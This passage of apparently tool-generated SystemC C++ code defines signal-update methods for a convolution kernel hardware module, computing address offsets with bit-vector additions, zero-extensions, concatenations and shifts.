!j_cast4_mid2_cast_reg_2585.read().is_01())? sc_lv<14>(): (sc_biguint<14>(tmp_162_reg_3324.read()) + sc_biguint<14>(j_cast4_mid2_cast_reg_2585.read())); } void convolve_kernel::thread_tmp_164_fu_1659_p2() { tmp_164_fu_1659_p2 = (tmp_48_reg_2414.read() | ap_const_lv9_F); } void convolve_kernel::thread_tmp_168_fu_1945_p1() { tmp_168_fu_1945_p1 = grp_fu_1831_p2.read().range(14-1, 0); } void convolve_kernel::thread_tmp_169_fu_2077_p2() { tmp_169_fu_2077_p2 = (!tmp_178_reg_3254.read().is_01() || !p_shl_cast_fu_2070_p3.read().is_01())? sc_lv<14>(): (sc_biguint<14>(tmp_178_reg_3254.read()) + sc_biguint<14>(p_shl_cast_fu_2070_p3.read())); } void convolve_kernel::thread_tmp_16_fu_1374_p2() { tmp_16_fu_1374_p2 = (!ap_const_lv16_F30.is_01() || !tmp_13_reg_2604.read().is_01())? sc_lv<16>(): (sc_biguint<16>(ap_const_lv16_F30) + sc_biguint<16>(tmp_13_reg_2604.read())); } void convolve_kernel::thread_tmp_170_cast_fu_2215_p1() { tmp_170_cast_fu_2215_p1 = esl_zext<64,14>(tmp_170_reg_3394.read()); } void convolve_kernel::thread_tmp_170_fu_2123_p2() { tmp_170_fu_2123_p2 = (!tmp_169_reg_3329.read().is_01() || !j_cast4_mid2_cast_reg_2585.read().is_01())? sc_lv<14>(): (sc_biguint<14>(tmp_169_reg_3329.read()) + sc_biguint<14>(j_cast4_mid2_cast_reg_2585.read())); } void convolve_kernel::thread_tmp_171_fu_1142_p2() { tmp_171_fu_1142_p2 = (!tmp_52_cast1_fu_1062_p1.read().is_01() || !row_b_cast3_mid2_cas_fu_1049_p1.read().is_01())? sc_lv<10>(): (sc_biguint<10>(tmp_52_cast1_fu_1062_p1.read()) + sc_biguint<10>(row_b_cast3_mid2_cas_fu_1049_p1.read())); } void convolve_kernel::thread_tmp_172_fu_1949_p1() { tmp_172_fu_1949_p1 = grp_fu_1831_p2.read().range(12-1, 0); } void convolve_kernel::thread_tmp_173_cast_fu_1228_p3() { tmp_173_cast_fu_1228_p3 = esl_concat<10,4>(tmp_171_reg_2562.read(), ap_const_lv4_0); } void convolve_kernel::thread_tmp_173_fu_1953_p1() { tmp_173_fu_1953_p1 = grp_fu_1835_p2.read().range(14-1, 0); } void convolve_kernel::thread_tmp_174_cast_fu_1241_p1() { tmp_174_cast_fu_1241_p1 = esl_zext<64,14>(tmp_174_fu_1235_p2.read()); } void convolve_kernel::thread_tmp_174_fu_1235_p2() { tmp_174_fu_1235_p2 = (!tmp_173_cast_fu_1228_p3.read().is_01() || !col_b_cast2_mid2_cas_fu_1182_p1.read().is_01())? sc_lv<14>(): (sc_biguint<14>(tmp_173_cast_fu_1228_p3.read()) + sc_biguint<14>(col_b_cast2_mid2_cas_fu_1182_p1.read())); } void convolve_kernel::thread_tmp_175_fu_1957_p1() { tmp_175_fu_1957_p1 = grp_fu_1835_p2.read().range(12-1, 0); } void convolve_kernel::thread_tmp_176_fu_1961_p1() { tmp_176_fu_1961_p1 = grp_fu_1839_p2.read().range(14-1, 0); } void convolve_kernel::thread_tmp_177_fu_1965_p1() { tmp_177_fu_1965_p1 = grp_fu_1839_p2.read().range(12-1, 0); } void convolve_kernel::thread_tmp_178_fu_1969_p1() { tmp_178_fu_1969_p1 = grp_fu_1843_p2.read().range(14-1, 0); } void convolve_kernel::thread_tmp_179_fu_1973_p1() { tmp_179_fu_1973_p1 = grp_fu_1843_p2.read().range(12-1, 0); } void convolve_kernel::thread_tmp_17_fu_1444_p2() { tmp_17_fu_1444_p2 = (!ap_const_lv16_1440.is_01() || !tmp_13_reg_2604.read().is_01())? sc_lv<16>(): (sc_biguint<16>(ap_const_lv16_1440) + sc_biguint<16>(tmp_13_reg_2604.read())); } void convolve_kernel::thread_tmp_18_fu_1688_p2() { tmp_18_fu_1688_p2 = (!ap_const_lv16_1950.is_01() || !tmp_13_reg_2604.read().is_01())? sc_lv<16>(): (sc_biguint<16>(ap_const_lv16_1950) + sc_biguint<16>(tmp_13_reg_2604.read())); } void convolve_kernel::thread_tmp_19_fu_1733_p2() { tmp_19_fu_1733_p2 = (!ap_const_lv16_1E60.is_01() || !tmp_13_reg_2604.read().is_01())? sc_lv<16>(): (sc_biguint<16>(ap_const_lv16_1E60) + sc_biguint<16>(tmp_13_reg_2604.read())); } void convolve_kernel::thread_tmp_1_fu_605_p2() { tmp_1_fu_605_p2 = (!ap_const_lv5_1.is_01())? sc_lv<5>(): col_b_phi_fu_547_p4.read() << (unsigned short)ap_const_lv5_1.to_uint(); } void convolve_kernel::thread_tmp_20_fu_1778_p2() { tmp_20_fu_1778_p2 = (!ap_const_lv16_2370.is_01() || !tmp_13_reg_2604.read().is_01())? sc_lv<16>(): (sc_biguint<16>(ap_const_lv16_2370) + sc_biguint<16>(tmp_13_reg_2604.read())); } void convolve_kernel::thread_tmp_21_fu_1847_p2() { tmp_21_fu_1847_p2 = (!ap_const_lv16_2880.is_01() || !tmp_13_reg_2604.read().is_01())? sc_lv<16>(): (sc_biguint<16>(ap_const_lv16_2880) + sc_biguint<16>(tmp_13_reg_2604.read())); } void convolve_kernel::thread_tmp_22_fu_1888_p2() { tmp_22_fu_1888_p2 = (!ap_const_lv16_2D90.is_01() || !tmp_13_reg_2604.read().is_01())? sc_lv<16>(): (sc_biguint<16>(ap_const_lv16_2D90) + sc_biguint<16>(tmp_13_reg_2604.read())); } void convolve_kernel::thread_tmp_23_fu_1977_p2() { tmp_23_fu_1977_p2 = (!ap_const_lv16_32A0.is_01() || !tmp_13_reg_2604.read().is_01())? sc_lv<16>(): (sc_biguint<16>(ap_const_lv16_32A0) + sc_biguint<16>(tmp_13_reg_2604.read())); } void convolve_kernel::thread_tmp_24_fu_2082_p2() { tmp_24_fu_2082_p2 = (!ap_const_lv16_37B0.is_01() || !tmp_13_reg_2604.read().is_01())? sc_lv<16>(): (sc_biguint<16>(ap_const_lv16_37B0) + sc_biguint<16>(tmp_13_reg_2604.read())); } void convolve_kernel::thread_tmp_25_fu_2127_p2() { tmp_25_fu_2127_p2 = (!ap_const_lv16_3CC0.is_01() || !tmp_13_reg_2604.read().is_01())? sc_lv<16>(): (sc_biguint<16>(ap_const_lv16_3CC0) + sc_biguint<16>(tmp_13_reg_2604.read())); } void convolve_kernel::thread_tmp_26_fu_2144_p2() { tmp_26_fu_2144_p2 = (!ap_const_lv16_41D0.is_01() || !tmp_13_reg_2604.read().is_01())? sc_lv<16>(): (sc_biguint<16>(ap_const_lv16_41D0) + sc_biguint<16>(tmp_13_reg_2604.read())); } void convolve_kernel::thread_tmp_27_fu_2161_p2() { tmp_27_fu_2161_p2 = (!ap_const_lv16_46E0.is_01() || !tmp_13_reg_2604.read().is_01())? sc_lv<16>(): (sc_biguint<16>(ap_const_lv16_46E0) + sc_biguint<16>(tmp_13_reg_2604.read())); } void convolve_kernel::thread_tmp_28_fu_2166_p2() { tmp_28_fu_2166_p2 = (!ap_const_lv16_4BF0.is_01() || !tmp_13_reg_2604.read().is_01())? sc_lv<16>(): (sc_biguint<16>(ap_const_lv16_4BF0) + sc_biguint<16>(tmp_13_reg_2604.read())); } void convolve_kernel::thread_tmp_29_fu_774_p2() { tmp_29_fu_774_p2 = (tmp_2_mid2_reg_2328.read() | exitcond_flatten_mid_2_reg_2299.read()); } void convolve_kernel::thread_tmp_2_fu_678_p2() { tmp_2_fu_678_p2 = (!to_b_phi_fu_559_p4.read().is_01() || !ap_const_lv5_10.is_01())? sc_lv<1>(): sc_lv<1>(to_b_phi_fu_559_p4.read() == ap_const_lv5_10); } void convolve_kernel::thread_tmp_2_mid1_fu_712_p2() { tmp_2_mid1_fu_712_p2 = (tmp_2_mid_fu_704_p2.read() & not_exitcond_flatten_1_reg_2274.read()); } void convolve_kernel::thread_tmp_2_mid2_fu_731_p2() { tmp_2_mid2_fu_731_p2 = (tmp_2_mid1_fu_712_p2.read() & not_exitcond_flatten_2_fu_726_p2.read()); } void convolve_kernel::thread_tmp_2_mid_fu_704_p2() { tmp_2_mid_fu_704_p2 = (tmp_2_reg_2285.read() & not_exitcond_flatten_reg_2262.read()); } void convolve_kernel::thread_tmp_30_fu_778_p2() { tmp_30_fu_778_p2 = (tmp_29_fu_774_p2.read() | tmp_3_reg_2315.read()); } void convolve_kernel::thread_tmp_31_fu_1001_p2() { tmp_31_fu_1001_p2 = (!ap_const_lv5_1.is_01())? sc_lv<5>(): col_b_1_reg_2408.read() << (unsigned short)ap_const_lv5_1.to_uint(); } void convolve_kernel::thread_tmp_32_fu_1254_p2() { tmp_32_fu_1254_p2 = (!tmp_13_reg_2604.read().is_01() || !tmp_cast_mid2_cast_fu_1251_p1.read().is_01())? sc_lv<16>(): (sc_biguint<16>(tmp_13_reg_2604.read()) + sc_biguint<16>(tmp_cast_mid2_cast_fu_1251_p1.read())); } void convolve_kernel::thread_tmp_33_fu_1325_p2() { tmp_33_fu_1325_p2 = (!tmp_14_reg_2655.read().is_01() || !tmp_cast_mid2_cast_reg_2660.read().is_01())? sc_lv<16>(): (sc_biguint<16>(tmp_14_reg_2655.read()) + sc_biguint<16>(tmp_cast_mid2_cast_reg_2660.read())); } void convolve_kernel::thread_tmp_34_fu_1383_p2() { tmp_34_fu_1383_p2 = (!tmp_15_reg_2709.read().is_01() || !tmp_cast_mid2_cast_reg_2660.read().is_01())? sc_lv<16>(): (sc_biguint<16>(tmp_15_reg_2709.read()) + sc_biguint<16>(tmp_cast_mid2_cast_reg_2660.read())); } void convolve_kernel::thread_tmp_35_cast_fu_1321_p1() { tmp_35_cast_fu_1321_p1 = esl_zext<64,16>(tmp_32_reg_2679.read()); } void convolve_kernel::thread_tmp_35_fu_1453_p2() { tmp_35_fu_1453_p2 = (!tmp_16_reg_2754.read().is_01() || !tmp_cast_mid2_cast_reg_2660.read().is_01())? sc_lv<16>(): (sc_biguint<16>(tmp_16_reg_2754.read()) + sc_biguint<16>(tmp_cast_mid2_cast_reg_2660.read())); } void convolve_kernel::thread_tmp_36_cast_fu_1379_p1() { tmp_36_cast_fu_1379_p1 = esl_zext<64,16>(tmp_33_reg_2719.read()); } void convolve_kernel::thread_tmp_36_fu_1697_p2() { tmp_36_fu_1697_p2 = (!tmp_17_reg_2814.read().is_01() || !tmp_cast_mid2_cast_reg_2660.read().is_01())? sc_lv<16>(): (sc_biguint<16>(tmp_17_reg_2814.read()) + sc_biguint<16>(tmp_cast_mid2_cast_reg_2660.read())); } void convolve_kernel::thread_tmp_37_cast_fu_1449_p1() { tmp_37_cast_fu_1449_p1 = esl_zext<64,16>(tmp_34_reg_2764.read()); } void convolve_kernel::thread_tmp_37_fu_1742_p2() { tmp_37_fu_1742_p2 = (!tmp_18_reg_2929.read().is_01() || !tmp_cast_mid2_cast_reg_2660.read().is_01())? sc_lv<16>(): (sc_biguint<16>(tmp_18_reg_2929.read()) + sc_biguint<16>(tmp_cast_mid2_cast_reg_2660.read())); } void convolve_kernel::thread_tmp_38_cast_fu_1693_p1() { tmp_38_cast_fu_1693_p1 = esl_zext<64,16>(tmp_35_reg_2824.read()); } void convolve_kernel::thread_tmp_38_fu_1787_p2() { tmp_38_fu_1787_p2 = (!tmp_19_reg_2984.read().is_01() || !tmp_cast_mid2_cast_reg_2660.read().is_01())? sc_lv<16>(): (sc_biguint<16>(tmp_19_reg_2984.read()) + sc_biguint<16>(tmp_cast_mid2_cast_reg_2660.read())); } void convolve_kernel::thread_tmp_39_cast_fu_1738_p1() { tmp_39_cast_fu_1738_p1 = esl_zext<64,16>(tmp_36_reg_2939.read()); } void convolve_kernel::thread_tmp_39_fu_1856_p2() { tmp_39_fu_1856_p2 = (!tmp_20_reg_3064.read().is_01() || !tmp_cast_mid2_cast_reg_2660.read().is_01())? sc_lv<16>(): (sc_biguint<16>(tmp_20_reg_3064.read()) + sc_biguint<16>(tmp_cast_mid2_cast_reg_2660.read())); } void convolve_kernel::thread_tmp_3_fu_708_p2() { tmp_3_fu_708_p2 = (exitcond_flatten43_m_reg_2290.read() | exitcond_flatten_reg_2238.read()); } void convolve_kernel::thread_tmp_40_cast_fu_1783_p1() { tmp_40_cast_fu_1783_p1 = esl_zext<64,16>(tmp_37_reg_2994.read()); } void convolve_kernel::thread_tmp_40_fu_1897_p2() { tmp_40_fu_1897_p2 = (!tmp_21_reg_3114.read().is_01() || !tmp_cast_mid2_cast_reg_2660.read().is_01())? sc_lv<16>(): (sc_biguint<16>(tmp_21_reg_3114.read()) + sc_biguint<16>(tmp_cast_mid2_cast_reg_2660.read())); } void convolve_kernel::thread_tmp_41_cast_fu_1852_p1() { tmp_41_cast_fu_1852_p1 = esl_zext<64,16>(tmp_38_reg_3074.read()); } void convolve_kernel::thread_tmp_41_fu_1986_p2() { tmp_41_fu_1986_p2 = (!tmp_22_reg_3164.read().is_01() || !tmp_cast_mid2_cast_reg_2660.read().is_01())? sc_lv<16>(): (sc_biguint<16>(tmp_22_reg_3164.read()) + sc_biguint<16>(tmp_cast_mid2_cast_reg_2660.read())); } void convolve_kernel::thread_tmp_42_cast_fu_1893_p1() { tmp_42_cast_fu_1893_p1 = esl_zext<64,16>(tmp_39_reg_3124.read()); } void convolve_kernel::thread_tmp_42_fu_2091_p2() { tmp_42_fu_2091_p2 = (!tmp_23_reg_3274.read().is_01() || !tmp_cast_mid2_cast_reg_2660.read().is_01())? sc_lv<16>(): (sc_biguint<16>(tmp_23_reg_3274.read()) + sc_biguint<16>(tmp_cast_mid2_cast_reg_2660.read())); } void convolve_kernel::thread_tmp_43_cast_fu_1982_p1() { tmp_43_cast_fu_1982_p1 = esl_zext<64,16>(tmp_40_reg_3174.read()); } void convolve_kernel::thread_tmp_43_fu_2136_p2() { tmp_43_fu_2136_p2 = (!tmp_24_reg_3344.read().is_01() || !tmp_cast_mid2_cast_reg_2660.read().is_01())? sc_lv<16>(): (sc_biguint<16>(tmp_24_reg_3344.read()) + sc_biguint<16>(tmp_cast_mid2_cast_reg_2660.read())); } void convolve_kernel::thread_tmp_44_cast_fu_2087_p1() { tmp_44_cast_fu_2087_p1 = esl_zext<64,16>(tmp_41_reg_3284.read()); } void convolve_kernel::thread_tmp_44_fu_2153_p2() { tmp_44_fu_2153_p2 = (!tmp_25_reg_3409.read().is_01() || !tmp_cast_mid2_cast_reg_2660.read().is_01())? sc_lv<16>(): (sc_biguint<16>(tmp_25_reg_3409.read()) + sc_biguint<16>(tmp_cast_mid2_cast_reg_2660.read())); } void convolve_kernel::thread_tmp_45_cast_fu_2132_p1() { tmp_45_cast_fu_2132_p1 = esl_zext<64,16>(tmp_42_reg_3354.read()); } void convolve_kernel::thread_tmp_45_fu_2175_p2() { tmp_45_fu_2175_p2 = (!tmp_26_reg_3444.read().is_01() || !tmp_cast_mid2_cast_reg_2660.read().is_01())? sc_lv<16>(): (sc_biguint<16>(tmp_26_reg_3444.read()) + sc_biguint<16>(tmp_cast_mid2_cast_reg_2660.read())); } void convolve_kernel::thread_tmp_46_cast_fu_2149_p1() { tmp_46_cast_fu_2149_p1 = esl_zext<64,16>(tmp_43_reg_3419.read()); } void convolve_kernel::thread_tmp_46_fu_2187_p2() { tmp_46_fu_2187_p2 = (!tmp_27_reg_3474.read().is_01() || !tmp_cast_mid2_cast_reg_2660.read().is_01())? sc_lv<16>(): (sc_biguint<16>(tmp_27_reg_3474.read()) + sc_biguint<16>(tmp_cast_mid2_cast_reg_2660.read())); } void convolve_kernel::thread_tmp_47_cast_fu_2171_p1() { tmp_47_cast_fu_2171_p1 = esl_zext<64,16>(tmp_44_reg_3454.read()); } void convolve_kernel::thread_tmp_47_fu_2191_p2() { tmp_47_fu_2191_p2 = (!tmp_28_reg_3479.read().is_01() || !tmp_cast_mid2_cast_reg_2660.read().is_01())? sc_lv<16>(): (sc_biguint<16>(tmp_28_reg_3479.read()) + sc_biguint<16>(tmp_cast_mid2_cast_reg_2660.read())); } void convolve_kernel::thread_tmp_48_cast_fu_2183_p1() { tmp_48_cast_fu_2183_p1 = esl_zext<64,16>(tmp_45_reg_3489.read()); } void convolve_kernel::thread_tmp_48_fu_824_p3() { tmp_48_fu_824_p3 = esl_concat<5,4>(to_b_mid2_reg_2369.read(), ap_const_lv4_0); } void convolve_kernel::thread_tmp_49_cast_fu_2199_p1() { tmp_49_cast_fu_2199_p1 = esl_zext<64,16>(tmp_46_reg_3514.read()); } void convolve_kernel::thread_tmp_49_fu_835_p3() { tmp_49_fu_835_p3 = esl_concat<5,6>(to_b_mid2_reg_2369.read(), ap_const_lv6_0); } void convolve_kernel::thread_tmp_50_cast_fu_2207_p1() { tmp_50_cast_fu_2207_p1 = esl_zext<64,16>(tmp_47_reg_3519.read()); } void convolve_kernel::thread_tmp_50_fu_846_p2() { tmp_50_fu_846_p2 = (!tmp_52_cast_fu_831_p1.read().is_01() || !p_shl3_cast_fu_842_p1.read().is_01())? sc_lv<12>(): (sc_biguint<12>(tmp_52_cast_fu_831_p1.read()) + sc_biguint<12>(p_shl3_cast_fu_842_p1.read())); } void convolve_kernel::thread_tmp_51_fu_852_p1() { tmp_51_fu_852_p1 = tmp_50_fu_846_p2.read().range(3-1, 0); } void convolve_kernel::thread_tmp_52_cast1_fu_1062_p1() { tmp_52_cast1_fu_1062_p1 = esl_zext<10,9>(tmp_48_reg_2414.read()); } void convolve_kernel::thread_tmp_52_cast_fu_831_p1() { tmp_52_cast_fu_831_p1 = esl_zext<12,9>(tmp_48_fu_824_p3.read()); } void convolve_kernel::thread_tmp_52_fu_1016_p2() { tmp_52_fu_1016_p2 = (tmp_51_reg_2432.read() | i_cast7_mid2_reg_2386.read()); } void convolve_kernel::thread_tmp_54_fu_1065_p3() { tmp_54_fu_1065_p3 = esl_concat<9,3>(tmp_53_reg_2437.read(), tmp_52_reg_2500.read()); } void convolve_kernel::thread_tmp_55_fu_1083_p2() { tmp_55_fu_1083_p2 = (!tmp_59_cast_fu_1071_p1.read().is_01() || !p_shl34_cast_fu_1075_p4.read().is_01())? sc_lv<14>(): (sc_biguint<14>(tmp_59_cast_fu_1071_p1.read()) + sc_biguint<14>(p_shl34_cast_fu_1075_p4.read())); } void convolve_kernel::thread_tmp_56_fu_1185_p2() { tmp_56_fu_1185_p2 = (!tmp_55_reg_2527.read().is_01() || !j_cast4_mid2_cast_fu_1151_p1.read().is_01())? sc_lv<14>(): (sc_biguint<14>(tmp_55_reg_2527.read()) + sc_biguint<14>(j_cast4_mid2_cast_fu_1151_p1.read())); } void convolve_kernel::thread_tmp_57_fu_866_p2() { tmp_57_fu_866_p2 = (tmp_48_fu_824_p3.read() | ap_const_lv9_1); } void convolve_kernel::thread_tmp_59_cast_fu_1071_p1() { tmp_59_cast_fu_1071_p1 = esl_zext<14,12>(tmp_54_fu_1065_p3.read()); } void convolve_kernel::thread_tmp_5_cast_fu_595_p1() { tmp_5_cast_fu_595_p1 = esl_zext<6,5>(tmp_fu_589_p2.read()); } void convolve_kernel::thread_tmp_5_cast_mid1_fu_979_p1() { tmp_5_cast_mid1_fu_979_p1 = esl_zext<6,5>(tmp_9_fu_974_p2.read()); } void convolve_kernel::thread_tmp_5_fu_717_p2() { tmp_5_fu_717_p2 = (exitcond_flatten_mid_2_reg_2299.read() | exitcond_flatten43_m_reg_2290.read()); } void convolve_kernel::thread_tmp_61_fu_1329_p1() { tmp_61_fu_1329_p1 = grp_fu_1190_p2.read().range(14-1, 0); } void convolve_kernel::thread_tmp_62_cast_fu_1259_p1() { tmp_62_cast_fu_1259_p1 = esl_zext<64,14>(tmp_56_reg_2624.read()); } void convolve_kernel::thread_tmp_62_fu_1333_p1() { tmp_62_fu_1333_p1 = grp_fu_1190_p2.read().range(12-1, 0); } void convolve_kernel::thread_tmp_63_fu_1394_p2() { tmp_63_fu_1394_p2 = (!tmp_61_reg_2724.read().is_01() || !p_shl32_cast_fu_1387_p3.read().is_01())? sc_lv<14>(): (sc_biguint<14>(tmp_61_reg_2724.read()) + sc_biguint<14>(p_shl32_cast_fu_1387_p3.read())); } void convolve_kernel::thread_tmp_64_fu_1457_p2() { tmp_64_fu_1457_p2 = (!tmp_63_reg_2769.read().is_01() || !j_cast4_mid2_cast_reg_2585.read().is_01())? sc_lv<14>(): (sc_biguint<14>(tmp_63_reg_2769.read()) + sc_biguint<14>(j_cast4_mid2_cast_reg_2585.read())); } void convolve_kernel::thread_tmp_65_fu_1020_p2() { tmp_65_fu_1020_p2 = (tmp_48_reg_2414.read() | ap_const_lv9_2); } void convolve_kernel::thread_tmp_69_cast_fu_1701_p1() { tmp_69_cast_fu_1701_p1 = esl_zext<64,14>(tmp_64_reg_2829.read()); } void convolve_kernel::thread_tmp_69_fu_1399_p1() { tmp_69_fu_1399_p1 = grp_fu_1263_p2.read().range(14-1, 0); } void convolve_kernel::thread_tmp_6_cast_mid2_fu_1052_p3() { tmp_6_cast_mid2_fu_1052_p3 = (!exitcond_flatten_mid_2_reg_2299.read()[0].is_01())? sc_lv<6>(): ((exitcond_flatten_mid_2_reg_2299.read()[0].to_bool())? tmp_6_mid1_reg_2479.read(): tmp_6_cast_mid5_reg_2468.read()); } void convolve_kernel::thread_tmp_6_cast_mid3_fu_937_p3() { tmp_6_cast_mid3_fu_937_p3 = (!exitcond_flatten_reg_2238.read()[0].is_01())? sc_lv<6>(): ((exitcond_flatten_reg_2238.read()[0].to_bool())? tmp_6_cast_mid_cast_fu_934_p1.read(): tmp_6_reg_2219.read()); } void convolve_kernel::thread_tmp_6_cast_mid5_fu_955_p3() { tmp_6_cast_mid5_fu_955_p3 = (!exitcond_flatten43_m_reg_2290.read()[0].is_01())? sc_lv<6>(): ((exitcond_flatten43_m_reg_2290.read()[0].to_bool())? i_cast7_mid2_cast_fu_931_p1.read(): tmp_6_cast_mid3_fu_937_p3.read()); } void convolve_kernel::thread_tmp_6_cast_mid_cast_fu_934_p1() { tmp_6_cast_mid_cast_fu_934_p1 = esl_zext<6,3>(i_1_reg_2345.read()); } void convolve_kernel::thread_tmp_6_fu_599_p2() { tmp_6_fu_599_p2 = (!i_cast7_fu_581_p1.read().is_01() || !tmp_5_cast_fu_595_p1.read().is_01())? sc_lv<6>(): (sc_biguint<6>(i_cast7_fu_581_p1.read()) + sc_biguint<6>(tmp_5_cast_fu_595_p1.read())); } void convolve_kernel::thread_tmp_6_mid1_fu_983_p2() { tmp_6_mid1_fu_983_p2 = (!i_cast7_mid2_cast_fu_931_p1.read().is_01() || !tmp_5_cast_mid1_fu_979_p1.read().is_01())? sc_lv<6>(): (sc_biguint<6>(i_cast7_mid2_cast_fu_931_p1.read()) + sc_biguint<6>(tmp_5_cast_mid1_fu_979_p1.read())); } void convolve_kernel::thread_tmp_70_fu_1403_p1() { tmp_70_fu_1403_p1 = grp_fu_1263_p2.read().range(12-1, 0); } void convolve_kernel::thread_tmp_71_fu_1468_p2() { tmp_71_fu_1468_p2 = (!tmp_69_reg_2774.read().is_01() || !p_shl30_cast_fu_1461_p3.read().is_01())? sc_lv<14>(): (sc_biguint<14>(tmp_69_reg_2774.read()) + sc_biguint<14>(p_shl30_cast_fu_1461_p3.read())); } void convolve_kernel::thread_tmp_72_fu_1705_p2() { tmp_72_fu_1705_p2 = (!tmp_71_reg_2834.read().is_01() || !j_cast4_mid2_cast_reg_2585.read().is_01())? sc_lv<14>(): (sc_biguint<14>(tmp_71_reg_2834.read()) + sc_biguint<14>(j_cast4_mid2_cast_reg_2585.read())); } void convolve_kernel::thread_tmp_73_fu_1089_p2() { tmp_73_fu_1089_p2 = (tmp_48_reg_2414.read() | ap_const_lv9_3); } void convolve_kernel::thread_tmp_76_cast_fu_1746_p1() { tmp_76_cast_fu_1746_p1 = esl_zext<64,14>(tmp_72_reg_2949.read()); } void convolve_kernel::thread_tmp_77_fu_1473_p1() { tmp_77_fu_1473_p1 = grp_fu_1337_p2.read().range(14-1, 0); } void convolve_kernel::thread_tmp_78_fu_1477_p1() { tmp_78_fu_1477_p1 = grp_fu_1337_p2.read().range(12-1, 0); } void convolve_kernel::thread_tmp_79_fu_1716_p2() { tmp_79_fu_1716_p2 = (!tmp_77_reg_2839.read().is_01() || !p_shl28_cast_fu_1709_p3.read().is_01())? sc_lv<14>(): (sc_biguint<14>(tmp_77_reg_2839.read()) + sc_biguint<14>(p_shl28_cast_fu_1709_p3.read())); } void convolve_kernel::thread_tmp_7_fu_721_p2() { tmp_7_fu_721_p2 = (tmp_5_fu_717_p2.read() | exitcond_flatten_reg_2238.read()); } void convolve_kernel::thread_tmp_80_fu_1750_p2() { tmp_80_fu_1750_p2 = (!tmp_79_reg_2954.read().is_01() || !j_cast4_mid2_cast_reg_2585.read().is_01())? sc_lv<14>(): (sc_biguint<14>(tmp_79_reg_2954.read()) + sc_biguint<14>(j_cast4_mid2_cast_reg_2585.read())); } void convolve_kernel::thread_tmp_81_fu_1195_p2() { tmp_81_fu_1195_p2 = (tmp_48_reg_2414.read() | ap_const_lv9_4); } void convolve_kernel::thread_tmp_83_cast_fu_1791_p1() { tmp_83_cast_fu_1791_p1 = esl_zext<64,14>(tmp_80_reg_3004.read()); } void convolve_kernel::thread_tmp_85_fu_1721_p1() { tmp_85_fu_1721_p1 = grp_fu_1407_p2.read().range(14-1, 0); } void convolve_kernel::thread_tmp_86_fu_1725_p1() { tmp_86_fu_1725_p1 = grp_fu_1407_p2.read().range(12-1, 0); } void convolve_kernel::thread_tmp_87_fu_1761_p2() { tmp_87_fu_1761_p2 = (!tmp_85_reg_2959.read().is_01() || !p_shl26_cast_fu_1754_p3.read().is_01())? sc_lv<14>(): (sc_biguint<14>(tmp_85_reg_2959.read()) + sc_biguint<14>(p_shl26_cast_fu_1754_p3.read())); } void convolve_kernel::thread_tmp_88_fu_1795_p2() { tmp_88_fu_1795_p2 = (!tmp_87_reg_3009.read().is_01() || !j_cast4_mid2_cast_reg_2585.read().is_01())? sc_lv<14>(): (sc_biguint<14>(tmp_87_reg_3009.read()) + sc_biguint<14>(j_cast4_mid2_cast_reg_2585.read())); } void convolve_kernel::thread_tmp_89_fu_1267_p2() { tmp_89_fu_1267_p2 = (tmp_48_reg_2414.read() | ap_const_lv9_5); } void convolve_kernel::thread_tmp_90_cast_fu_1860_p1() { tmp_90_cast_fu_1860_p1 = esl_zext<64,14>(tmp_88_reg_3084.read()); } void convolve_kernel::thread_tmp_93_fu_1766_p1() { tmp_93_fu_1766_p1 = grp_fu_1481_p2.read().range(14-1, 0); } void convolve_kernel::thread_tmp_94_fu_1770_p1() { tmp_94_fu_1770_p1 = grp_fu_1481_p2.read().range(12-1, 0); } void convolve_kernel::thread_tmp_95_fu_1806_p2() { tmp_95_fu_1806_p2 = (!tmp_93_reg_3014.read().is_01() || !p_shl24_cast_fu_1799_p3.read().is_01())? sc_lv<14>(): (sc_biguint<14>(tmp_93_reg_3014.read()) + sc_biguint<14>(p_shl24_cast_fu_1799_p3.read())); } void convolve_kernel::thread_tmp_96_fu_1864_p2() { tmp_96_fu_1864_p2 = (!tmp_95_reg_3089.read().is_01() || !j_cast4_mid2_cast_reg_2585.read().is_01())? sc_lv<14>(): (sc_biguint<14>(tmp_95_reg_3089.read()) + sc_biguint<14>(j_cast4_mid2_cast_reg_2585.read())); } void convolve_kernel::thread_tmp_97_cast_fu_1901_p1() { tmp_97_cast_fu_1901_p1 = esl_zext<64,14>(tmp_96_reg_3134.read()); } void convolve_kernel::thread_tmp_97_fu_1341_p2() { tmp_97_fu_1341_p2 = (tmp_48_reg_2414.read() | ap_const_lv9_6); } void convolve_kernel::thread_tmp_9_cast_fu_611_p1() { tmp_9_cast_fu_611_p1 = esl_zext<6,5>(tmp_1_fu_605_p2.read()); } void convolve_kernel::thread_tmp_9_cast_mid1_fu_1006_p1() { tmp_9_cast_mid1_fu_1006_p1 = esl_zext<6,5>(tmp_31_fu_1001_p2.read()); } void convolve_kernel::thread_tmp_9_fu_974_p2() { tmp_9_fu_974_p2 = (!ap_const_lv5_1.is_01())? sc_lv<5>(): row_b_1_reg_2402.read() << (unsigned short)ap_const_lv5_1.to_uint(); } void convolve_kernel::thread_tmp_cast_mid2_cast_fu_1251_p1() { tmp_cast_mid2_cast_fu_1251_p1 = esl_zext<16,6>(tmp_cast_mid2_reg_2522.read()); } void convolve_kernel::thread_tmp_cast_mid2_fu_1057_p3() { tmp_cast_mid2_fu_1057_p3 = (!tmp_2_mid2_reg_2328.read()[0].is_01())? sc_lv<6>(): ((tmp_2_mid2_reg_2328.read()[0].to_bool())? tmp_mid1_reg_2495.read(): tmp_cast_mid5_reg_2484.read()); } void convolve_kernel::thread_tmp_cast_mid3_fu_962_p3() { tmp_cast_mid3_fu_962_p3 = (!exitcond_flatten43_m_reg_2290.read()[0].is_01())? sc_lv<6>(): ((exitcond_flatten43_m_reg_2290.read()[0].to_bool())? j_cast4_mid1_cast_fu_952_p1.read(): tmp_cast_mid_fu_943_p3.read()); } void convolve_kernel::thread_tmp_cast_mid5_fu_989_p3() { tmp_cast_mid5_fu_989_p3 = (!exitcond_flatten_mid_2_reg_2299.read()[0].is_01())? sc_lv<6>(): ((exitcond_flatten_mid_2_reg_2299.read()[0].to_bool())? j_cast5_mid2_cast_fu_949_p1.read(): tmp_cast_mid3_fu_962_p3.read()); } void convolve_kernel::thread_tmp_cast_mid_fu_943_p3() { tmp_cast_mid_fu_943_p3 = (!exitcond_flatten_reg_2238.read()[0].is_01())? sc_lv<6>(): ((exitcond_flatten_reg_2238.read()[0].to_bool())? ap_const_lv6_0: tmp_s_reg_2224.read()); } void convolve_kernel::thread_tmp_fu_589_p2() { tmp_fu_589_p2 = (!ap_const_lv5_1.is_01())? sc_lv<5>(): row_b_phi_fu_523_p4.read() << (unsigned short)ap_const_lv5_1.to_uint(); } void 